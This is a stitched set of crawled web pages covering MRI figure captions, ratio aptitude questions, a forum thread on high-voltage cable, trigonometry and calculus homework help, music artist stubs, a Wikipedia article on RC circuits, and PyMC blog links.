Figure 2: Final reconstructions from an in-vivo experiment. Top row: reconstructions from 25% of k-space data using the proposed non-iterative method (left), and an SWT-based Compressed Sensing method (middle) that converged after 24 iterations. Right: reconstruction from the fully-sampled k-space data. Bottom row: reconstruction errors with their NRMSE values
Figure 3: Final reconstructions from the second in-vivo experiment. Top row: reconstructions from 25% of k-space data using the proposed non-iterative method (left), and an SWT-based Compressed Sensing method (middle) that converged after 85 iterations. Right: reconstruction from the fully-sampled k-space data. Bottom row: reconstruction errors with their NRMSE values.
Proc. Intl. Soc. Mag. Reson. Med. 26 (2018)
3543 | 2022-05-20 13:23:43 | {"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 1, "mathjax_display_tex": 1, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.38748544454574585, "perplexity": 2878.8568660759656}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 5, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2022-21/segments/1652662532032.9/warc/CC-MAIN-20220520124557-20220520154557-00126.warc.gz"} |
http://examfriend.in/questions-and-answers/Arithmetic-aptitude/Ratio-and-Proportion/General-Questions/0.html | 12345>>
1.
Express 60 minutes as the fraction of one day.
A) $\frac{1}{12}$
B) $\frac{1}{20}$
C) $\frac{1}{24}$
D) $\frac{1}{18}$
E) $\frac{1}{36}$
2.
The compound ratio of $(1 : 2)$, $(3 : 2 )$, $(5 : 1)$ is
A) 7 : 1
B) 2 : 5
C) 15 : 4
D) 4 : 15
E) 7 : 5
3.
The ratio of vimal’s age and amala’s age is in the ratio 3 : 5 and their sum of their age is 80 years .The ratio of their ages after 10 years will be
A) 2 : 3
B) 1 : 3
C) 3 : 5
D) 2 : 5
E) 4 : 5
4.
If Rs.91 is divided amoung A,B, and C in tha ratio $1\frac{1}{2}:3\frac{1}{3}:2\frac{3}{4}$, then B will get
A) Rs.36
B) Rs.40
C) Rs.45
D) Rs.48
E) Rs.55
5.
A vessel contains 56 litres of mixture of milk and water in the ratio 5 : 2.How much water should be mixed with it so that the ratio of milk to water may be 4 : 5?
A) 16 litres
B) 30 litres
C) 28 litres
D) 34 litres
E) 45 litres
12345>> | 2019-03-23 06:31:55 | {"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 1, "mathjax_display_tex": 0, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.80750972032547, "perplexity": 2493.974966210648}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2019-13/segments/1552912202728.21/warc/CC-MAIN-20190323060839-20190323082839-00349.warc.gz"} |
https://forum.allaboutcircuits.com/threads/copper-conductors.84470/ | # copper conductors
#### masudasim
Joined Jul 10, 2010
15
Hello all
I need an insulated multi stranded copper conductor which can carry 8-9 Amp current, should be screened, having an insulation which can withstand working voltage of 1.5KVrms atlleast. Moreover insulation should be flexability as this cable is needed to be wind/unwind regularly.
As for as current carrying capacity is concerned, i think AWG11/12 will be suitable for me. The problem i face is finding a combination of individually screening, flexibility as well as high working voltage i.e. 1.5 KVrms.
Can any one kindly suggest any solution especially regarding type of insulation suitable (for 1.5KVrms and flexible) as well as screening?
Thanks
Note:The most common insulation i found during search is PVC but its flexibility/Voltage rating is in question.
#### PackratKing
Joined Jul 13, 2008
843
what kind of hardware is it required to un/wind from, and how long a distance does it have to cover... pictures would help... and where on earth are you...
Standard 7-lead thermostat wire is fairly close to what you need... 24 awg stranded conductors, PTFE insulation.
I hook florescent lighting up with it, so voltage is not an issue, since it does not have to flex... tho' there are many ways of "skinning a cat"
#### PackratKing
Joined Jul 13, 2008
843
Voltage IS an issue.. typical 150V or 300V thermostat wire is NOT suitable for 1500V working voltage...
You are right , Mcgyvr, Florescents are HV items indeed, tho' the current is so low, and my Hi-Pot indicated the insulation would handle the load -
This setup was one temporary unit for lighting in my shop, after my 1 year old $13 chinese florescent fixtures' ballast violently released its magic smoke and a shower of hot tar... cussed chinese <snip> anyway -- the stench of burning ballast lingers still... The temporary lighting has since been dismantled, and replaced with some good Made in U.S.A. gear, and I wouldn't recommend anyone else trying to build anything like it... Last edited: Thread Starter #### masudasim Joined Jul 10, 2010 15 Thanks very much for help. i will check this cable #### mcgyvr Joined Oct 15, 2009 5,394 You are right , Mcgyvr, Florescents are HV items indeed, tho' the current is so low, and my Hi-Pot indicated the insulation would handle the load - This setup was one temporary unit for lighting in my shop, after my 1 year old$ 13 chinese florescent fixtures' ballast violently released its magic smoke and a shower of hot tar... cussed chinese <snip> anyway -- the stench of burning ballast lingers still...
The temporary lighting has since been dismantled, and replaced with some good Made in U.S.A. gear, and I wouldn't recommend anyone else trying to build anything like it...
Just because it "works" doesn't mean its right.. Since I actually work in the professional world I know that you MUST ensure the items you use are rated to the levels you need.. If I went into UL with a product designed for 1.5kV working voltage with a 600V rated cable they will just laugh me out of there (at my expense)..
Heck even the thinnest wire insulation should pass a 1000V hipot test.. But voltage ratings are determined by way more than just a "fresh insulation" hipot test.
So my answers on this forum are usually from a "I don't care if it works.. if it isn't rated for that then don't do it" perspective. | 2019-11-22 15:50:33 | {"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 1, "mathjax_display_tex": 0, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.25336089730262756, "perplexity": 5011.962073089962}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2019-47/segments/1573496671363.79/warc/CC-MAIN-20191122143547-20191122172547-00555.warc.gz"} |
http://www.jiskha.com/display.cgi?id=1368110443 | Monday
September 22, 2014
# Homework Help: math trig
Posted by Zoe on Thursday, May 9, 2013 at 10:40am.
If a ferris wheel with a 20.5 meter radius, how high would one car be from the loding dock at these given angles trveled by the rider?:
90
135
180
225
270
315
405
450
495
and 540?
• math trig - Reiny, Thursday, May 9, 2013 at 12:33pm
I will do of these,
for 135° :
assume the axle is 20.5 above the ground
height above axle:
sin135 = h/20.5
h = 20.5sin135 = appr 14.5 m
so height above the ground = 20.5 + 14.5 = 35
for 315°
height from axle :
sin 315 = h/20.5
h = 20.5sin135 = appr - 14.5
notice the position would be BELOW the axle
so height above ground = 20.5 - 14.5 = 6 m
First Name: School Subject: Answer:
Related Questions
Trig - A ferris wheel has a 14 meter diameter and turns counterclockwise at 6 ...
Physics - Fairgoers ride a Ferris wheel with a radius of 5.00 {\rm m} . The ...
Math (Trig) - a ferris wheel has a radius of 10m and is one meter above the ...
Physics - While riding a Ferris wheel, the rider determines that the Ferris ...
Math -Trig Please help! - At one time, Maple Leaf Village (which no longer ...
calculus - A Ferris wheel with a radius of 13 m is rotating at a rate of one ...
calculus - A Ferris wheel with a radius of 13 m is rotating at a rate of one ...
Trigonometric Functions! (Ferris Wheel) - The Ferris wheel at a carnival has a ...
Honor Physics - Fairgoers ride a Ferris wheel with a radius of 5.00 . The wheel ...
physics - The Ferris Wheel in the figure below is a vertical, circular amusement...
Search
Members | 2014-09-22 20:44:37 | {"extraction_info": {"found_math": false, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 0, "mathjax_display_tex": 0, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.8214328289031982, "perplexity": 3059.481704164924}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.3, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2014-41/segments/1410657137190.70/warc/CC-MAIN-20140914011217-00119-ip-10-234-18-248.ec2.internal.warc.gz"} |
http://mymathforum.com/calculus/331264-finding-length-graph-polar.html | My Math Forum Finding the length of a graph (polar)
Calculus Calculus Math Forum
May 4th, 2016, 05:17 PM #1 Member Joined: May 2015 From: Earth Posts: 64 Thanks: 0 Finding the length of a graph (polar) Given that $r=-4\sin(\theta)$, how does one find the length of the curve for this graph? I took the integral of $\displaystyle \sqrt{16\sin(\theta)^2 + 16\cos(\theta)^2}$ from 0 to 2$\pi$, which would give me 8$\pi$ as my answer. However, the correct answer is 4$\pi$. Why is this? Is the integral from 0 to $\pi$ instead? Does this mean if I were to find the area of this shape the integral would also be to $\pi$ instead of 2$\pi$? Thanks. Last edited by skipjack; May 4th, 2016 at 08:45 PM.
May 4th, 2016, 05:25 PM #2 Math Team Joined: Dec 2013 From: Colombia Posts: 7,276 Thanks: 2437 Math Focus: Mainly analysis and algebra Yes. The domain is between zero and $\pi$. After that, it just starts tracing out the same shape again. Yes, for the area, you would also be integrating from zero to $\pi$.
May 4th, 2016, 05:25 PM #3 Member Joined: May 2015 From: Earth Posts: 64 Thanks: 0 Thanks for the quick answer archie!
May 4th, 2016, 05:26 PM #4 Math Team Joined: Dec 2013 From: Colombia Posts: 7,276 Thanks: 2437 Math Focus: Mainly analysis and algebra It's a circle of radius 2, not 4.
Tags finding, graph, length, polar
Thread Tools Display Modes Linear Mode
Similar Threads Thread Thread Starter Forum Replies Last Post Jas17 Computer Science 1 November 8th, 2015 07:38 PM fredlo2010 Calculus 0 November 2nd, 2014 05:12 PM 1love Calculus 3 May 23rd, 2012 09:27 PM IneedofHelp Algebra 0 November 16th, 2011 08:19 PM alex5 Calculus 6 May 17th, 2009 02:45 PM
Contact - Home - Forums - Cryptocurrency Forum - Top | 2018-04-26 22:37:06 | {"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 1, "mathjax_display_tex": 0, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.8521221876144409, "perplexity": 2824.208851880495}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2018-17/segments/1524125948617.86/warc/CC-MAIN-20180426222608-20180427002608-00372.warc.gz"} |
https://www.transtutors.com/questions/2c-find-the-elasticity-of-money-demand-with-respect-to-real-output-at-the-equilibriu-5133346.htm | # 2c) Find the elasticity of money demand with respect to real output at the equilibrium values...
2c) Find the elasticity of money demand with respect to real output at the equilibrium values (recall from your first yeas class: 47. or 14 x (5) 2d) The central bank increases the nominal money supply by 10%. Assume that the real interest rate is constant since it is determined by the goods market equilibrium. • Show what happens to expected inflation if the price level stays constant in the short rim. (4) • Instead, assume that expected inflation remains constant but the price level responds, what is the new price level? (4)
Attachments: | 2020-03-31 02:23:29 | {"extraction_info": {"found_math": false, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 0, "mathjax_display_tex": 0, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.8541940450668335, "perplexity": 1370.4253360735186}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2020-16/segments/1585370499280.44/warc/CC-MAIN-20200331003537-20200331033537-00046.warc.gz"} |
http://www.last.fm/music/Trovadores+Urbanos/+similar | 1. We don't have a wiki here yet...
2. We don't have a wiki here yet...
3. We don't have a wiki here yet...
4. We don't have a wiki here yet...
5. We don't have a wiki here yet...
6. We don't have a wiki here yet...
7. Oscar Castro-Neves (15/5/1940 - Rio de Janeiro) is a gifted Brazilian musician settled in the U.S. since 1966. Besides his important contribution to…
8. We don't have a wiki here yet...
9. We don't have a wiki here yet...
10. We don't have a wiki here yet...
11. We don't have a wiki here yet...
12. We don't have a wiki here yet...
13. We don't have a wiki here yet...
14. We don't have a wiki here yet...
15. We don't have a wiki here yet...
16. We don't have a wiki here yet...
17. We don't have a wiki here yet...
18. Paulo Artur Mendes Pupo Nogueira, or just Paulinho Nogueira (1929-2002), was an eclectic Brazilian composer and musician, with influences of Bossa… | 2015-11-30 22:36:26 | {"extraction_info": {"found_math": false, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 0, "mathjax_display_tex": 0, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.8999199867248535, "perplexity": 5209.239523573008}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.3, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2015-48/segments/1448398464253.80/warc/CC-MAIN-20151124205424-00000-ip-10-71-132-137.ec2.internal.warc.gz"} |
https://en.wikipedia.org/wiki/Rc_circuit | # RC circuit
(Redirected from Rc circuit)
Jump to: navigation, search
A resistor–capacitor circuit (RC circuit), or RC filter or RC network, is an electric circuit composed of resistors and capacitors driven by a voltage or current source. A first order RC circuit is composed of one resistor and one capacitor and is the simplest type of RC circuit.
RC circuits can be used to filter a signal by blocking certain frequencies and passing others. The two most common RC filters are the high-pass filters and low-pass filters; band-pass filters and band-stop filters usually require RLC filters, though crude ones can be made with RC filters.
## Introduction
There are three basic, linear passive lumped analog circuit components: the resistor (R), the capacitor (C), and the inductor (L). These may be combined in the RC circuit, the RL circuit, the LC circuit, and the RLC circuit, with the acronyms indicating which components are used. These circuits, among them, exhibit a large number of important types of behaviour that are fundamental to much of analog electronics. In particular, they are able to act as passive filters. This article considers the RC circuit, in both series and parallel forms, as shown in the diagrams below.
## Natural response
RC circuit
The simplest RC circuit is a capacitor and a resistor in parallel. When a circuit consists of only a charged capacitor and a resistor, the capacitor will discharge its stored energy through the resistor. The voltage across the capacitor, which is time dependent, can be found by using Kirchhoff's current law, where the current charging the capacitor must equal the current through the resistor. This results in the linear differential equation
${\displaystyle C{\frac {dV}{dt}}+{\frac {V}{R}}=0}$.
where C= capacitance of capacitor.
Solving this equation for V yields the formula for exponential decay:
${\displaystyle V(t)=V_{0}e^{-{\frac {t}{RC}}}\ ,}$
where V0 is the capacitor voltage at time t = 0.
The time required for the voltage to fall to ${\displaystyle {\frac {V_{0}}{e}}}$ is called the RC time constant and is given by
${\displaystyle \tau =RC\ .}$
## Complex impedance
The complex impedance, ZC (in ohms) of a capacitor with capacitance C (in farads) is
${\displaystyle Z_{C}={\frac {1}{sC}}}$
The complex frequency s is, in general, a complex number,
${\displaystyle s\ =\ \sigma +j\omega }$
where
• ${\displaystyle j}$ represents the imaginary unit:
${\displaystyle j^{2}=-1}$
### Sinusoidal steady state
Sinusoidal steady state is a special case in which the input voltage consists of a pure sinusoid (with no exponential decay). As a result,
${\displaystyle \sigma \ =\ 0}$
and the evaluation of s becomes
${\displaystyle s\ =\ j\omega }$
## Series circuit
Series RC circuit
By viewing the circuit as a voltage divider, the voltage across the capacitor is:
${\displaystyle V_{C}(s)={\frac {1/Cs}{R+1/Cs}}V_{\rm {in}}(s)={\frac {1}{1+RCs}}V_{\rm {in}}(s)}$
and the voltage across the resistor is:
${\displaystyle V_{R}(s)={\frac {R}{R+1/Cs}}V_{\rm {in}}(s)={\frac {RCs}{1+RCs}}V_{\rm {in}}(s)}$.
### Transfer functions
The transfer function from the input voltage to the voltage across the capacitor is
${\displaystyle H_{C}(s)={V_{C}(s) \over V_{\rm {in}}(s)}={1 \over 1+RCs}}$.
Similarly, the transfer function from the input to the voltage across the resistor is
${\displaystyle H_{R}(s)={V_{R}(s) \over V_{\rm {in}}(s)}={RCs \over 1+RCs}}$.
#### Poles and zeros
Both transfer functions have a single pole located at
${\displaystyle s=-{1 \over RC}}$ .
In addition, the transfer function for the resistor has a zero located at the origin.
### Gain and phase
The magnitude of the gains across the two components are:
${\displaystyle G_{C}=|H_{C}(j\omega )|=\left|{\frac {V_{C}(j\omega )}{V_{\rm {in}}(j\omega )}}\right|={\frac {1}{\sqrt {1+\left(\omega RC\right)^{2}}}}}$
and
${\displaystyle G_{R}=|H_{R}(j\omega )|=\left|{\frac {V_{R}(j\omega )}{V_{\rm {in}}(j\omega )}}\right|={\frac {\omega RC}{\sqrt {1+\left(\omega RC\right)^{2}}}}}$,
and the phase angles are:
${\displaystyle \phi _{C}=\angle H_{C}(j\omega )=\tan ^{-1}\left(-\omega RC\right)}$
and
${\displaystyle \phi _{R}=\angle H_{R}(j\omega )=\tan ^{-1}\left({\frac {1}{\omega RC}}\right)}$.
These expressions together may be substituted into the usual expression for the phasor representing the output:
${\displaystyle V_{C}\ =\ G_{C}V_{\rm {in}}e^{j\phi _{C}}}$
${\displaystyle V_{R}\ =\ G_{R}V_{in}e^{j\phi _{R}}}$.
### Current
The current in the circuit is the same everywhere since the circuit is in series:
${\displaystyle I(s)={\frac {V_{\rm {in}}(s)}{R+{\frac {1}{Cs}}}}={Cs \over 1+RCs}V_{\rm {in}}(s)}$
### Impulse response
The impulse response for each voltage is the inverse Laplace transform of the corresponding transfer function. It represents the response of the circuit to an input voltage consisting of an impulse or Dirac delta function.
The impulse response for the capacitor voltage is
${\displaystyle h_{C}(t)={1 \over RC}e^{-t/RC}u(t)={1 \over \tau }e^{-t/\tau }u(t)}$
where u(t) is the Heaviside step function and
${\displaystyle \tau \ =\ RC}$
is the time constant.
Similarly, the impulse response for the resistor voltage is
${\displaystyle h_{R}(t)=\delta (t)-{1 \over RC}e^{-t/RC}u(t)=\delta (t)-{1 \over \tau }e^{-t/\tau }u(t)}$
where δ(t) is the Dirac delta function
### Frequency-domain considerations
These are frequency domain expressions. Analysis of them will show which frequencies the circuits (or filters) pass and reject. This analysis rests on a consideration of what happens to these gains as the frequency becomes very large and very small.
As ${\displaystyle \omega \to \infty }$:
${\displaystyle G_{C}\to 0}$
${\displaystyle G_{R}\to 1}$.
As ${\displaystyle \omega \to 0}$:
${\displaystyle G_{C}\to 1}$
${\displaystyle G_{R}\to 0}$.
This shows that, if the output is taken across the capacitor, high frequencies are attenuated (shorted to ground) and low frequencies are passed. Thus, the circuit behaves as a low-pass filter. If, though, the output is taken across the resistor, high frequencies are passed and low frequencies are attenuated (since the capacitor blocks the signal as its frequency approaches 0). In this configuration, the circuit behaves as a high-pass filter.
The range of frequencies that the filter passes is called its bandwidth. The point at which the filter attenuates the signal to half its unfiltered power is termed its cutoff frequency. This requires that the gain of the circuit be reduced to
${\displaystyle G_{C}=G_{R}={\frac {1}{\sqrt {2}}}}$.
Solving the above equation yields
${\displaystyle \omega _{c}={\frac {1}{RC}}}$
or
${\displaystyle f_{c}={\frac {1}{2\pi RC}}}$
which is the frequency that the filter will attenuate to half its original power.
Clearly, the phases also depend on frequency, although this effect is less interesting generally than the gain variations.
As ${\displaystyle \omega \to 0}$:
${\displaystyle \phi _{C}\to 0}$
${\displaystyle \phi _{R}\to 90^{\circ }=\pi /2^{c}}$.
As ${\displaystyle \omega \to \infty }$:
${\displaystyle \phi _{C}\to -90^{\circ }=-\pi /2^{c}}$
${\displaystyle \phi _{R}\to 0}$
So at DC (0 Hz), the capacitor voltage is in phase with the signal voltage while the resistor voltage leads it by 90°. As frequency increases, the capacitor voltage comes to have a 90° lag relative to the signal and the resistor voltage comes to be in-phase with the signal.
### Time-domain considerations
This section relies on knowledge of e, the natural logarithmic constant.
The most straightforward way to derive the time domain behaviour is to use the Laplace transforms of the expressions for ${\displaystyle V_{C}}$ and ${\displaystyle V_{R}}$ given above. This effectively transforms ${\displaystyle j\omega \to s}$. Assuming a step input (i.e. ${\displaystyle V_{in}=0}$ before ${\displaystyle t=0}$ and then ${\displaystyle V_{in}=V}$ afterwards):
${\displaystyle V_{\rm {in}}(s)=V{\frac {1}{s}}}$
${\displaystyle V_{C}(s)=V{\frac {1}{1+sRC}}{\frac {1}{s}}}$
and
${\displaystyle V_{R}(s)=V{\frac {sRC}{1+sRC}}{\frac {1}{s}}}$.
Capacitor voltage step-response.
Resistor voltage step-response.
Partial fractions expansions and the inverse Laplace transform yield:
${\displaystyle \,\!V_{C}(t)=V\left(1-e^{-t/RC}\right)}$
${\displaystyle \,\!V_{R}(t)=Ve^{-t/RC}}$.
These equations are for calculating the voltage across the capacitor and resistor respectively while the capacitor is charging; for discharging, the equations are vice versa. These equations can be rewritten in terms of charge and current using the relationships C=Q/V and V=IR (see Ohm's law).
Thus, the voltage across the capacitor tends towards V as time passes, while the voltage across the resistor tends towards 0, as shown in the figures. This is in keeping with the intuitive point that the capacitor will be charging from the supply voltage as time passes, and will eventually be fully charged.
These equations show that a series RC circuit has a time constant, usually denoted ${\displaystyle \tau =RC}$ being the time it takes the voltage across the component to either rise (across C) or fall (across R) to within ${\displaystyle 1/e}$ of its final value. That is, ${\displaystyle \tau }$ is the time it takes ${\displaystyle V_{C}}$ to reach ${\displaystyle V(1-1/e)}$ and ${\displaystyle V_{R}}$ to reach ${\displaystyle V(1/e)}$.
The rate of change is a fractional ${\displaystyle \left(1-{\frac {1}{e}}\right)}$ per ${\displaystyle \tau }$. Thus, in going from ${\displaystyle t=N\tau }$ to ${\displaystyle t=(N+1)\tau }$, the voltage will have moved about 63.2% of the way from its level at ${\displaystyle t=N\tau }$ toward its final value. So C will be charged to about 63.2% after ${\displaystyle \tau }$, and essentially fully charged (99.3%) after about ${\displaystyle 5\tau }$. When the voltage source is replaced with a short-circuit, with C fully charged, the voltage across C drops exponentially with t from ${\displaystyle V}$ towards 0. C will be discharged to about 36.8% after ${\displaystyle \tau }$, and essentially fully discharged (0.7%) after about ${\displaystyle 5\tau }$. Note that the current, ${\displaystyle I}$, in the circuit behaves as the voltage across R does, via Ohm's Law.
These results may also be derived by solving the differential equations describing the circuit:
${\displaystyle {\frac {V_{\rm {in}}-V_{C}}{R}}=C{\frac {dV_{C}}{dt}}}$
and
${\displaystyle \,\!V_{R}=V_{\rm {in}}-V_{C}}$.
The first equation is solved by using an integrating factor and the second follows easily; the solutions are exactly the same as those obtained via Laplace transforms.
#### Integrator
Consider the output across the capacitor at high frequency i.e.
${\displaystyle \omega \gg {\frac {1}{RC}}}$.
This means that the capacitor has insufficient time to charge up and so its voltage is very small. Thus the input voltage approximately equals the voltage across the resistor. To see this, consider the expression for ${\displaystyle I}$ given above:
${\displaystyle I={\frac {V_{in}}{R+1/j\omega C}}}$
but note that the frequency condition described means that
${\displaystyle \omega C\gg {\frac {1}{R}}}$
so
${\displaystyle I\approx {\frac {V_{in}}{R}}}$ which is just Ohm's Law.
Now,
${\displaystyle V_{C}={\frac {1}{C}}\int _{0}^{t}Idt}$
so
${\displaystyle V_{C}\approx {\frac {1}{RC}}\int _{0}^{t}V_{in}dt}$,
which is an integrator across the capacitor.
#### Differentiator
Consider the output across the resistor at low frequency i.e.,
${\displaystyle \omega \ll {\frac {1}{RC}}}$.
This means that the capacitor has time to charge up until its voltage is almost equal to the source's voltage. Considering the expression for ${\displaystyle I}$ again, when
${\displaystyle R\ll {\frac {1}{\omega C}}}$,
so
${\displaystyle I\approx {\frac {V_{in}}{1/j\omega C}}}$
${\displaystyle V_{in}\approx {\frac {I}{j\omega C}}=V_{C}}$
Now,
${\displaystyle V_{R}=IR=C{\frac {dV_{C}}{dt}}R}$
${\displaystyle V_{R}\approx RC{\frac {dV_{in}}{dt}}}$
which is a differentiator across the resistor.
More accurate integration and differentiation can be achieved by placing resistors and capacitors as appropriate on the input and feedback loop of operational amplifiers (see operational amplifier integrator and operational amplifier differentiator).
## Parallel circuit
Parallel RC circuit
The parallel RC circuit is generally of less interest than the series circuit. This is largely because the output voltage ${\displaystyle V_{out}}$ is equal to the input voltage ${\displaystyle V_{in}}$ — as a result, this circuit does not act as a filter on the input signal unless fed by a current source.
With complex impedances:
${\displaystyle I_{R}={\frac {V_{in}}{R}}\,}$
and
${\displaystyle I_{C}=j\omega CV_{in}\,}$.
This shows that the capacitor current is 90° out of phase with the resistor (and source) current. Alternatively, the governing differential equations may be used:
${\displaystyle I_{R}={\frac {V_{in}}{R}}}$
and
${\displaystyle I_{C}=C{\frac {dV_{in}}{dt}}}$.
When fed by a current source, the transfer function of a parallel RC circuit is:
${\displaystyle {\frac {V_{out}}{I_{in}}}={\frac {R}{1+sRC}}}$. | 2016-07-29 18:07:09 | {"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 94, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 0, "mathjax_display_tex": 0, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.7990937829017639, "perplexity": 660.1862899562925}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 5, "enable": false}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2016-30/segments/1469257831770.41/warc/CC-MAIN-20160723071031-00098-ip-10-185-27-174.ec2.internal.warc.gz"} |
https://healthyalgorithms.com/tag/pymc/page/2/ | # Tag Archives: pymc
## MCMC in Python: sampling in parallel with PyMC
Question and answer on Stack Overflow.
Comments Off on MCMC in Python: sampling in parallel with PyMC
Filed under software engineering
## MCMC in Python: Estimating failure rates from observed data
A question and answer on CrossValidated, which make me reflect on the danger of knowing enough statistics to be dangerous.
Comments Off on MCMC in Python: Estimating failure rates from observed data
Filed under statistics
## MCMC in Python: How to make a custom sampler in PyMC
The PyMC documentation is a little slim on the topic of defining a custom sampler, and I had to figure it out for some DisMod work over the years. Here is a minimal example of how I did it, in answer to a CrossValidated question.
Comments Off on MCMC in Python: How to make a custom sampler in PyMC
Filed under MCMC
## MCMC in Python: How to set a custom prior with joint distribution on two parameters in PyMC
